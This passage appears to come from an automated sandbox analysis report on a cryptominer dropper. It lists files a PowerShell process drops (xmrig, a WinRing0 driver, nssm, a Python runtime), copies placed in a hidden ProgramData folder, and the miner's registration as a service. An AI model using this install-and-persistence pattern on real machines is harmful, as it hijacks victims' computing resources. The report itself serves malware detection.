                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_BLAKE2s.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\PublicKey\_x25519.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\nvrtc64_120_0.dll (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Scripts\normalizer.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\unicodedata.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\w64.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\PublicKey\_ec_ws.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Scripts\pip3.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_keccak.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA1.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_bz2.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\xmrig.exe (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_BLAKE2b.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Scripts\pip3.12.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\sqlite3.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\PublicKey\_ed448.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Scripts\wheel.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA256.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\winsound.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\WinRing0x64.sysJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\setuptools\cli-64.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_lzma.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\nssm.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_RIPEMD160.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_elementtree.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_ghash_portable.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_hashlib.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\xmrig.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\vcruntime140.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\nssm.exe (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\xmrig-cuda.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\t64.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_asyncio.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\xmrig-cuda.dll (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_msi.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_ghash_clmul.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\setuptools\cli.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_uuid.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_MD2.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_zoneinfo.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\nssm.exe (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\xmrig.exe (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\nvrtc-builtins64_124.dll (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\xmrig-cuda.dll (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\nvrtc64_120_0.dll (copy)Jump to dropped file
                    Source: C:\ProgramData\.logstxt\nssm.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\xmrig\Parameters
                    Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014000C8F0 TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError,19_2_000000014000C8F0
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
